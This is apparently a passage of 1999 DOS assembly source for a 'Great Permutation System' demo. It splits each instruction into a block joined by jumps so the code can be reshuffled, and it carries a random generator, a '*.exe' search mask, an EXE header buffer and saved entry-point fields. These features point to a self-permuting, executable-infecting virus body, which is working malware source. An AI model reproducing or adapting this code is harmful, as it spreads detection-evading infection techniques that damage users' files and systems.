GPSVAR_00188 EQU OFFSET GPS_00189-OFFSET GPS_00188 OR 40H
GPS_00188:
MOV AX,BX
DB 0E9H, 0, 0
GPSVAR_00189 EQU OFFSET GPS_00190-OFFSET GPS_00189 OR 40H
GPS_00189:
POP BX
DB 0E9H, 0, 0
GPSVAR_00190 EQU OFFSET GPS_00191-OFFSET GPS_00190
GPS_00190:
RET 
CREATECOPY ENDP 
FINDOFFSETS PROC NEAR 
GPSVAR_00191 EQU OFFSET GPS_00192-OFFSET GPS_00191 OR 40H
GPS_00191:
MOV CX,N
DB 0E9H, 0, 0
GPSVAR_00192 EQU OFFSET GPS_00193-OFFSET GPS_00192 OR 40H
GPS_00192:
XOR DX,DX
DB 0E9H, 0, 0
GPSVAR_00193 EQU OFFSET GPS_00194-OFFSET GPS_00193 OR 40H
GPS_00193:
FO1: XOR BP,BP
DB 0E9H, 0, 0
GPSVAR_00194 EQU OFFSET GPS_00195-OFFSET GPS_00194 OR 40H
GPS_00194:
XOR BX,BX
DB 0E9H, 0, 0
GPSVAR_00195 EQU OFFSET GPS_00196-OFFSET GPS_00195 OR 40H
GPS_00195:
PUSH DI
DB 0E9H, 0, 0
GPSVAR_00196 EQU OFFSET GPS_00197-OFFSET GPS_00196 OR 40H
GPS_00196:
FO2: MOV DI,DS:[SI+BX]
DB 0E9H, 0, 0
GPSVAR_00197 EQU OFFSET GPS_00198-OFFSET GPS_00197 OR 40H
GPS_00197:
CMP DI,DX
DB 0E9H, 0, 0
GPSVAR_00198 EQU OFFSET GPS_00199-OFFSET GPS_00198 OR 80H
GPS_00198:
JE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET FO3-$-2
GPSVAR_00199 EQU OFFSET GPS_00200-OFFSET GPS_00199 OR 40H
GPS_00199:
MOV AL,DS:[DI+BLOCKSIZE]
DB 0E9H, 0, 0
GPSVAR_00200 EQU OFFSET GPS_00201-OFFSET GPS_00200 OR 40H
GPS_00200:
AND AX,111111B
DB 0E9H, 0, 0
GPSVAR_00201 EQU OFFSET GPS_00202-OFFSET GPS_00201 OR 40H
GPS_00201:
ADD BP,AX
DB 0E9H, 0, 0
GPSVAR_00202 EQU OFFSET GPS_00203-OFFSET GPS_00202 OR 40H
GPS_00202:
INC BX
DB 0E9H, 0, 0
GPSVAR_00203 EQU OFFSET GPS_00204-OFFSET GPS_00203 OR 40H
GPS_00203:
INC BX
DB 0E9H, 0, 0
GPSVAR_00204 EQU OFFSET GPS_00205-OFFSET GPS_00204 OR 40H
GPS_00204:
DB 0E9H
DW OFFSET FO2-$-2
GPSVAR_00205 EQU OFFSET GPS_00206-OFFSET GPS_00205 OR 40H
GPS_00205:
FO3: POP DI
DB 0E9H, 0, 0
GPSVAR_00206 EQU OFFSET GPS_00207-OFFSET GPS_00206 OR 40H
GPS_00206:
MOV AX,BP
DB 0E9H, 0, 0
GPSVAR_00207 EQU OFFSET GPS_00208-OFFSET GPS_00207 OR 40H
GPS_00207:
STOSW
DB 0E9H, 0, 0
GPSVAR_00208 EQU OFFSET GPS_00209-OFFSET GPS_00208 OR 40H
GPS_00208:
INC DX
DB 0E9H, 0, 0
GPSVAR_00209 EQU OFFSET GPS_00210-OFFSET GPS_00209 OR 80H
GPS_00209:
LOOP $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET FO1-$-2
GPSVAR_00210 EQU OFFSET GPS_00211-OFFSET GPS_00210
GPS_00210:
RET 
FINDOFFSETS ENDP 
FINDTARGET PROC NEAR 
GPSVAR_00211 EQU OFFSET GPS_00212-OFFSET GPS_00211 OR 40H
GPS_00211:
PUSH BX
DB 0E9H, 0, 0
GPSVAR_00212 EQU OFFSET GPS_00213-OFFSET GPS_00212 OR 40H
GPS_00212:
XOR BX,BX
DB 0E9H, 0, 0
GPSVAR_00213 EQU OFFSET GPS_00214-OFFSET GPS_00213 OR 40H
GPS_00213:
FT1: CMP DS:[BLOCKOFS+BX],AX
DB 0E9H, 0, 0
GPSVAR_00214 EQU OFFSET GPS_00215-OFFSET GPS_00214 OR 80H
GPS_00214:
JE $+5
DB 0E9H, 3, 0
DB 0E9H
DW OFFSET FT2-$-2
GPSVAR_00215 EQU OFFSET GPS_00216-OFFSET GPS_00215 OR 40H
GPS_00215:
INC BX
DB 0E9H, 0, 0
GPSVAR_00216 EQU OFFSET GPS_00217-OFFSET GPS_00216 OR 40H
GPS_00216:
INC BX
DB 0E9H, 0, 0
GPSVAR_00217 EQU OFFSET GPS_00218-OFFSET GPS_00217 OR 40H
GPS_00217:
DB 0E9H
DW OFFSET FT1-$-2
GPSVAR_00218 EQU OFFSET GPS_00219-OFFSET GPS_00218 OR 40H
GPS_00218:
FT2: MOV AX,DS:[BLOCKOFS2+BX]
DB 0E9H, 0, 0
GPSVAR_00219 EQU OFFSET GPS_00220-OFFSET GPS_00219 OR 40H
GPS_00219:
ADD AX,OFFSET CODE2-OFFSET START
DB 0E9H, 0, 0
GPSVAR_00220 EQU OFFSET GPS_00221-OFFSET GPS_00220 OR 40H
GPS_00220:
POP BX
DB 0E9H, 0, 0
GPSVAR_00221 EQU OFFSET GPS_00222-OFFSET GPS_00221
GPS_00221:
RET 
FINDTARGET ENDP 
RANDOMIZE PROC NEAR 
GPSVAR_00222 EQU OFFSET GPS_00223-OFFSET GPS_00222 OR 40H
GPS_00222:
MOV AH,2CH
DB 0E9H, 0, 0
GPSVAR_00223 EQU OFFSET GPS_00224-OFFSET GPS_00223 OR 40H
GPS_00223:
INT 21H
DB 0E9H, 0, 0
GPSVAR_00224 EQU OFFSET GPS_00225-OFFSET GPS_00224 OR 40H
GPS_00224:
MOV WORD PTR DS:[RANDSEED],CX
DB 0E9H, 0, 0
GPSVAR_00225 EQU OFFSET GPS_00226-OFFSET GPS_00225 OR 40H
GPS_00225:
MOV WORD PTR DS:[RANDSEED+2],DX
DB 0E9H, 0, 0
GPSVAR_00226 EQU OFFSET GPS_00227-OFFSET GPS_00226
GPS_00226:
RET 
RANDOMIZE ENDP 
RANDOM PROC NEAR 
GPSVAR_00227 EQU OFFSET GPS_00228-OFFSET GPS_00227 OR 40H
GPS_00227:
PUSH BX
DB 0E9H, 0, 0
GPSVAR_00228 EQU OFFSET GPS_00229-OFFSET GPS_00228 OR 40H
GPS_00228:
PUSH CX
DB 0E9H, 0, 0
GPSVAR_00229 EQU OFFSET GPS_00230-OFFSET GPS_00229 OR 40H
GPS_00229:
PUSH DX
DB 0E9H, 0, 0
GPSVAR_00230 EQU OFFSET GPS_00231-OFFSET GPS_00230 OR 40H
GPS_00230:
PUSH SI
DB 0E9H, 0, 0
GPSVAR_00231 EQU OFFSET GPS_00232-OFFSET GPS_00231 OR 40H
GPS_00231:
MOV SI,AX
DB 0E9H, 0, 0
GPSVAR_00232 EQU OFFSET GPS_00233-OFFSET GPS_00232 OR 40H
GPS_00232:
MOV AX,WORD PTR DS:[RANDSEED]
DB 0E9H, 0, 0
GPSVAR_00233 EQU OFFSET GPS_00234-OFFSET GPS_00233 OR 40H
GPS_00233:
MOV BX,WORD PTR DS:[RANDSEED+2]
DB 0E9H, 0, 0
GPSVAR_00234 EQU OFFSET GPS_00235-OFFSET GPS_00234 OR 40H
GPS_00234:
MOV CX,AX
DB 0E9H, 0, 0
GPSVAR_00235 EQU OFFSET GPS_00236-OFFSET GPS_00235 OR 40H
GPS_00235:
MUL DS:[RANDMAGIC]
DB 0E9H, 0, 0
GPSVAR_00236 EQU OFFSET GPS_00237-OFFSET GPS_00236 OR 40H
GPS_00236:
SHL CX,3
DB 0E9H, 0, 0
GPSVAR_00237 EQU OFFSET GPS_00238-OFFSET GPS_00237 OR 40H
GPS_00237:
ADD CH,CL
DB 0E9H, 0, 0
GPSVAR_00238 EQU OFFSET GPS_00239-OFFSET GPS_00238 OR 40H
GPS_00238:
ADD DX,CX
DB 0E9H, 0, 0
GPSVAR_00239 EQU OFFSET GPS_00240-OFFSET GPS_00239 OR 40H
GPS_00239:
ADD DX,BX
DB 0E9H, 0, 0
GPSVAR_00240 EQU OFFSET GPS_00241-OFFSET GPS_00240 OR 40H
GPS_00240:
SHL BX,2
DB 0E9H, 0, 0
GPSVAR_00241 EQU OFFSET GPS_00242-OFFSET GPS_00241 OR 40H
GPS_00241:
ADD DX,BX
DB 0E9H, 0, 0
GPSVAR_00242 EQU OFFSET GPS_00243-OFFSET GPS_00242 OR 40H
GPS_00242:
ADD DH,BL
DB 0E9H, 0, 0
GPSVAR_00243 EQU OFFSET GPS_00244-OFFSET GPS_00243 OR 40H
GPS_00243:
SHL BX,5
DB 0E9H, 0, 0
GPSVAR_00244 EQU OFFSET GPS_00245-OFFSET GPS_00244 OR 40H
GPS_00244:
ADD DH,BL
DB 0E9H, 0, 0
GPSVAR_00245 EQU OFFSET GPS_00246-OFFSET GPS_00245 OR 40H
GPS_00245:
ADD AX,1
DB 0E9H, 0, 0
GPSVAR_00246 EQU OFFSET GPS_00247-OFFSET GPS_00246 OR 40H
GPS_00246:
ADC DX,0
DB 0E9H, 0, 0
GPSVAR_00247 EQU OFFSET GPS_00248-OFFSET GPS_00247 OR 40H
GPS_00247:
MOV WORD PTR DS:[RANDSEED],AX
DB 0E9H, 0, 0
GPSVAR_00248 EQU OFFSET GPS_00249-OFFSET GPS_00248 OR 40H
GPS_00248:
MOV WORD PTR DS:[RANDSEED+2],DX
DB 0E9H, 0, 0
GPSVAR_00249 EQU OFFSET GPS_00250-OFFSET GPS_00249 OR 40H
GPS_00249:
MOV CX,DX
DB 0E9H, 0, 0
GPSVAR_00250 EQU OFFSET GPS_00251-OFFSET GPS_00250 OR 40H
GPS_00250:
MUL SI
DB 0E9H, 0, 0
GPSVAR_00251 EQU OFFSET GPS_00252-OFFSET GPS_00251 OR 40H
GPS_00251:
MOV AX,CX
DB 0E9H, 0, 0
GPSVAR_00252 EQU OFFSET GPS_00253-OFFSET GPS_00252 OR 40H
GPS_00252:
MOV CX,DX
DB 0E9H, 0, 0
GPSVAR_00253 EQU OFFSET GPS_00254-OFFSET GPS_00253 OR 40H
GPS_00253:
MUL SI
DB 0E9H, 0, 0
GPSVAR_00254 EQU OFFSET GPS_00255-OFFSET GPS_00254 OR 40H
GPS_00254:
ADD AX,CX
DB 0E9H, 0, 0
GPSVAR_00255 EQU OFFSET GPS_00256-OFFSET GPS_00255 OR 40H
GPS_00255:
ADC DX,0
DB 0E9H, 0, 0
GPSVAR_00256 EQU OFFSET GPS_00257-OFFSET GPS_00256 OR 40H
GPS_00256:
MOV AX,DX
DB 0E9H, 0, 0
GPSVAR_00257 EQU OFFSET GPS_00258-OFFSET GPS_00257 OR 40H
GPS_00257:
POP SI
DB 0E9H, 0, 0
GPSVAR_00258 EQU OFFSET GPS_00259-OFFSET GPS_00258 OR 40H
GPS_00258:
POP DX
DB 0E9H, 0, 0
GPSVAR_00259 EQU OFFSET GPS_00260-OFFSET GPS_00259 OR 40H
GPS_00259:
POP CX
DB 0E9H, 0, 0
GPSVAR_00260 EQU OFFSET GPS_00261-OFFSET GPS_00260 OR 40H
GPS_00260:
POP BX
DB 0E9H, 0, 0
GPSVAR_00261 EQU OFFSET GPS_00262-OFFSET GPS_00261
GPS_00261:
RET 
RANDOM ENDP 
GPS_00262:
;#CODEEND
Old_ip			dw 0
Old_cs			dw 10h
Old_sp			dw 4096
Old_ss			dw 10h
XorKey			db 0
ExData:
Exe			db '*.exe',0
RandMagic		dw 8405h
Copyright		db 13,10
                        db ' Great Permutation System demo program'
			db 13,10
			db ' Copyright (C) 1999 by Tahorg'
			db 13,10
N			equ 110h
BlockPos		dw N dup (?)
BlockSize		db N dup (?)
Code2			db (Old_ip-Start) dup (?)
Old_ip2			dw (?)
Old_cs2			dw (?)
Old_sp2			dw (?)
Old_ss2			dw (?)
XorKey2			db (?)
Data2			db (BlockPos-ExData) dup (?)
BlockPos2		dw N dup (?)
BlockSize2		db N dup (?)
BlockOfs		dw N dup (?)
BlockOfs2		dw N dup (?)
Header			db 1ch dup (?)
DTA			db 43 dup (?)
RandSeed		dd (?)
DataEnd:
Vseg ends
Sseg segment use16 stack
			db 4096 dup (?)
Sseg ends
end Start
